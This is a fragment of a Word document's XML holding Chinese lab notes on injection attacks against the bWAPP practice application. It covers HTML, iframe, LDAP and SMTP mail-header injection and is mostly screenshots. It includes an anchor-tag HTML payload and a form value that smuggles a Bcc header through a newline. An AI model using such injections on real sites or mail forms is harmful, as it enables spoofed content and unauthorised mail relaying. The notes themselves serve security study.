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6250B9" w14:textId="77777777" w:rsidR="003E5308" w:rsidRDefault="003E5308" w:rsidP="003E5308">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改虚拟机键盘：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09990690" w14:textId="34C2B339" w:rsidR="003E5308" w:rsidRDefault="003E5308" w:rsidP="003E5308">
      <w:r w:rsidRPr="003E5308">
        <w:t>system-preferences-Keyboard-Keyboard Preferences-Layouts-add-china-remove</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A06F3D" w14:textId="34A719E4" w:rsidR="00D16586" w:rsidRDefault="00455990" w:rsidP="003C2A00">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A1 </w:t>
      </w:r>
      <w:r w:rsidR="00D16586">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0153079E" w14:textId="134784CE" w:rsidR="00D16586" w:rsidRDefault="00D16586" w:rsidP="00D16586">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入-反射型(</w:t>
      </w:r>
      <w:r>
        <w:t>GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4B7B3F" w14:textId="3A5E4366" w:rsidR="00D16586" w:rsidRDefault="00D16586" w:rsidP="00D16586">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入框内输入html标签</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=www.baidu.com&gt;click&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4C6211" w14:textId="31D725FB" w:rsidR="00D16586" w:rsidRDefault="00D16586" w:rsidP="00D16586">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06C9F889" wp14:editId="75657502">
            <wp:extent cx="5274310" cy="2759710"/>
            <wp:effectExtent l="0" t="0" r="254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4310" cy="2759710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D8D18C" w14:textId="1C93E151" w:rsidR="00B94EAE" w:rsidRDefault="00B94EAE" w:rsidP="00B94EAE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入-反射型(</w:t>
      </w:r>
      <w:r>
        <w:t>POST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7037ACA0" w14:textId="231334B8" w:rsidR="00B94EAE" w:rsidRDefault="00B94EAE" w:rsidP="00B94EAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32DA2D05" wp14:editId="7D5902CB">
            <wp:extent cx="5274310" cy="263525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2635250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC6B829" w14:textId="0EE91B08" w:rsidR="00B94EAE" w:rsidRDefault="00B94EAE" w:rsidP="00B94EAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FBEC98A" wp14:editId="4A48DFB5">
            <wp:extent cx="5274310" cy="362331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3623310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEB9F35" w14:textId="77777777" w:rsidR="00B94EAE" w:rsidRPr="00B94EAE" w:rsidRDefault="00B94EAE" w:rsidP="00B94EAE"/>
    <w:p w14:paraId="20007BB7" w14:textId="62C8F325" w:rsidR="00B94EAE" w:rsidRDefault="00B94EAE" w:rsidP="00B94EAE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入-反射型(</w:t>
      </w:r>
      <w:r>
        <w:t>URL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B174B51" w14:textId="4412B774" w:rsidR="00B94EAE" w:rsidRPr="00B94EAE" w:rsidRDefault="00157D6C" w:rsidP="00B94EAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D14AF7D" wp14:editId="01E88DB8">
            <wp:extent cx="5274310" cy="343725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437255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B1F3BC" w14:textId="5F93D2F6" w:rsidR="00B94EAE" w:rsidRDefault="00157D6C" w:rsidP="00B94EAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45110E05" wp14:editId="01427A12">
            <wp:extent cx="5274310" cy="305181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051810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="072D12B4" w14:textId="77777777" w:rsidR="00B94EAE" w:rsidRPr="00B94EAE" w:rsidRDefault="00B94EAE" w:rsidP="00B94EAE"/>
    <w:p w14:paraId="67068F7A" w14:textId="060440A6" w:rsidR="0009740F" w:rsidRPr="0009740F" w:rsidRDefault="00157D6C" w:rsidP="0009740F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入-存储型(</w:t>
      </w:r>
      <w:r w:rsidR="00C27734">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00C27734">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0620C16D" w14:textId="3ECFD603" w:rsidR="00157D6C" w:rsidRDefault="00157D6C" w:rsidP="00157D6C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46520130" wp14:editId="52C79F2F">
            <wp:extent cx="5274310" cy="2570480"/>
            <wp:effectExtent l="0" t="0" r="2540"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570480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27831359" w14:textId="6A8A0F4D" w:rsidR="00157D6C" w:rsidRDefault="00157D6C" w:rsidP="00157D6C"/>
    <w:p w14:paraId="0E6FA744" w14:textId="77777777" w:rsidR="0009740F" w:rsidRDefault="00157D6C" w:rsidP="0009740F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F176E86" wp14:editId="5DFAAB21">
            <wp:extent cx="5274310" cy="403987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4039870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="358AC560" w14:textId="77777777" w:rsidR="0009740F" w:rsidRDefault="0009740F" w:rsidP="0009740F"/>
    <w:p w14:paraId="5089DAEB" w14:textId="10EB6C61" w:rsidR="0009740F" w:rsidRPr="0009740F" w:rsidRDefault="00875957" w:rsidP="0009740F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="0009740F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222E4791" w14:textId="5775D895" w:rsidR="00157D6C" w:rsidRDefault="00C27734" w:rsidP="00157D6C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常访问：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F02A0DF" w14:textId="2A7DE856" w:rsidR="00C27734" w:rsidRDefault="00C27734" w:rsidP="00157D6C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B47036F" wp14:editId="2BA865BA">
            <wp:extent cx="5274310" cy="3420110"/>
            <wp:effectExtent l="0" t="0" r="254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420110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C4D407" w14:textId="57029CAD" w:rsidR="00C27734" w:rsidRDefault="00C27734" w:rsidP="00157D6C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FE33661" wp14:editId="6939078D">
            <wp:extent cx="5274310" cy="242570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425700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="583D8139" w14:textId="1084DC74" w:rsidR="0009740F" w:rsidRDefault="00875957" w:rsidP="00157D6C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="540A00A4" wp14:editId="3FBB42E5">
            <wp:extent cx="5274310" cy="330390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303905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A418D5D" w14:textId="77C09E3C" w:rsidR="0009740F" w:rsidRDefault="0009740F" w:rsidP="00157D6C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看页面源码</w:t>
      </w:r>
      <w:r w:rsidR="00875957">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也能明白</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E107DB5" w14:textId="6B992B63" w:rsidR="0009740F" w:rsidRDefault="00875957" w:rsidP="0009740F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E226BF3" wp14:editId="6979334E">
            <wp:extent cx="5274310" cy="108712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087120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E52FFE" w14:textId="77777777" w:rsidR="0009740F" w:rsidRDefault="0009740F" w:rsidP="0009740F"/>
    <w:p w14:paraId="0E720B51" w14:textId="0C563081" w:rsidR="00C27734" w:rsidRDefault="00875957" w:rsidP="0009740F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ECEA6A" w14:textId="361DD68D" w:rsidR="00773354" w:rsidRDefault="00710F7C" w:rsidP="009909CC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00710F7C">
        <w:t>LDAP是轻量目录访问协议，英文全称是Lightweight Directory Access Protocol，一般都简称为LDAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00227106">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以理解为存储数据的数据库，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因其</w:t>
      </w:r>
      <w:r w:rsidR="00227106">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是树形结构，查询效率更高。注入话的和S</w:t>
      </w:r>
      <w:r w:rsidR="00227106">
        <w:t>QL</w:t>
      </w:r>
      <w:r w:rsidR="00227106">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidR="0096606D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似</w:t>
      </w:r>
      <w:r w:rsidR="00227106">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以需要</w:t>
      </w:r>
      <w:r w:rsidR="0096606D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重点</w:t>
      </w:r>
      <w:r w:rsidR="00227106">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>理解L</w:t>
      </w:r>
      <w:r w:rsidR="00227106">
        <w:t>DAP</w:t>
      </w:r>
      <w:r w:rsidR="00227106">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的语法</w:t>
      </w:r>
      <w:r w:rsidR="00773354">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。可以参考如下链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFCBB18" w14:textId="7E8ED0CB" w:rsidR="00157D6C" w:rsidRDefault="00773354" w:rsidP="00773354">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00227106" w:rsidRPr="00227106">
        <w:t>ttps://blog.csdn.net/qq_19876131/article/details/50577355</w:t>
      </w:r>
      <w:r w:rsidR="00227106">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200B162D" w14:textId="15FA7890" w:rsidR="00CE56CD" w:rsidRDefault="00875957" w:rsidP="004F42C3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件头注入</w:t>
      </w:r>
      <w:r w:rsidR="00455990">
        <w:t>(SMTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C352A2A" w14:textId="5A30DAF6" w:rsidR="00540A59" w:rsidRDefault="00540A59">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F4CF606" wp14:editId="3F1ED117">
            <wp:extent cx="5274310" cy="2889885"/>
            <wp:effectExtent l="0" t="0" r="254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889885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E30CF76" w14:textId="61F95433" w:rsidR="0038419C" w:rsidRDefault="008922F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要弄懂电子邮件头注入，需要掌握</w:t>
      </w:r>
      <w:r w:rsidR="000D42E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>smtp邮件头结构：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319757A4" w14:textId="6FD9F94F" w:rsidR="000D42E0" w:rsidRDefault="000D42E0" w:rsidP="000D42E0">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:t>Date: Oct  7 20:30:39 2018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D1DB76" w14:textId="452CD3A6" w:rsidR="000D42E0" w:rsidRDefault="000D42E0" w:rsidP="000D42E0">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:t>From: "f4guo" &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>4guo@</w:t>
      </w:r>
      <w:r w:rsidR="00D85A76">
        <w:t>163</w:t>
      </w:r>
      <w:r>
        <w:t>.com&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>To:  "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" &lt;hmp@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:t>.com&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Subject: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D85A76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ceshi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>Content-Type: text/plain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AC6417" w14:textId="09CF415C" w:rsidR="00D85A76" w:rsidRPr="00D85A76" w:rsidRDefault="00D85A76" w:rsidP="00D85A76">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中“f</w:t>
      </w:r>
      <w:r>
        <w:t>4guo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”为用户名，后接邮箱，等同于f</w:t>
      </w:r>
      <w:r>
        <w:t>4guo@163.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293E13DB" w14:textId="28369CE5" w:rsidR="000D42E0" w:rsidRDefault="00373DBB" w:rsidP="000D42E0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓取数据包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7AD614" w14:textId="6CAFB9FB" w:rsidR="0038419C" w:rsidRDefault="00540A59">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12A22BAC" wp14:editId="7591928A">
            <wp:extent cx="5274310" cy="231267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312670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BD5E6E" w14:textId="14571FB9" w:rsidR="0038419C" w:rsidRDefault="000D42E0" w:rsidP="0038419C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidR="0038419C" w:rsidRPr="0038419C">
        <w:t>name=f4guo&amp;email=</w:t>
      </w:r>
      <w:r w:rsidR="00540A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f4guo</w:t>
      </w:r>
      <w:r w:rsidR="0038419C" w:rsidRPr="0038419C">
        <w:t>%40</w:t>
      </w:r>
      <w:r w:rsidR="00540A59">
        <w:t>163</w:t>
      </w:r>
      <w:r w:rsidR="0038419C" w:rsidRPr="0038419C">
        <w:t>.com&amp;remarks=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0038419C" w:rsidRPr="0038419C">
        <w:t>ceshi&amp;form</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0038419C" w:rsidRPr="0038419C">
        <w:t>=submit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行注入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EF4EA8" w14:textId="4ED59E4F" w:rsidR="000D42E0" w:rsidRDefault="000D42E0" w:rsidP="0038419C">
      <w:r w:rsidRPr="0038419C">
        <w:t>name=f4guo</w:t>
      </w:r>
      <w:r w:rsidR="00A71BBC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="000D42E0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00540A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>bcc</w:t>
      </w:r>
      <w:r w:rsidRPr="000D42E0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:hmp%40test.com</w:t>
      </w:r>
      <w:r w:rsidRPr="0038419C">
        <w:t>&amp;email=bwapp%40mailinator.com&amp;remarks=ceshi&amp;form=submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135E5822" w14:textId="74F60511" w:rsidR="00BC1B2F" w:rsidRDefault="00540A59" w:rsidP="00540A59">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注：bcc为发送类别，bcc是密送，cc是抄送，to是普通发送。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E8FB7" w14:textId="77777777" w:rsidR="00BC1B2F" w:rsidRDefault="000D42E0" w:rsidP="00BC1B2F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以根据网页内容判断smtp头变为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF3C7BC" w14:textId="74DBA75C" w:rsidR="000D42E0" w:rsidRDefault="000D42E0" w:rsidP="00BC1B2F">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>From:</w:t>
      </w:r>
      <w:r w:rsidR="00D85A76">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D85A76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“f</w:t>
      </w:r>
      <w:r w:rsidR="00D85A76">
        <w:t>4guo</w:t>
      </w:r>
      <w:r w:rsidR="00D85A76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00D85A76">
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00540A59">
        <w:t>f4guo</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidR="00540A59">
        <w:t>163</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B2F" w:rsidRPr="0038419C">
        <w:t>.com</w:t>
      </w:r>
      <w:r w:rsidR="00D85A76">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B531AD0" w14:textId="710A2F76" w:rsidR="00BC1B2F" w:rsidRDefault="00540A59" w:rsidP="00540A59">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cc:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B2F">
        <w:t>hmp@test.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2DD9CD" w14:textId="6B68E5B0" w:rsidR="00BC1B2F" w:rsidRDefault="000D42E0" w:rsidP="00BC1B2F">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To:  </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B2F" w:rsidRPr="0038419C">
        <w:t>bwapp</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B2F" w:rsidRPr="0038419C">
        <w:t>mailinator.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C250F1D" w14:textId="25AD7C40" w:rsidR="000D42E0" w:rsidRDefault="000D42E0" w:rsidP="00BC1B2F">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Subject: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D85A76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ceshi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
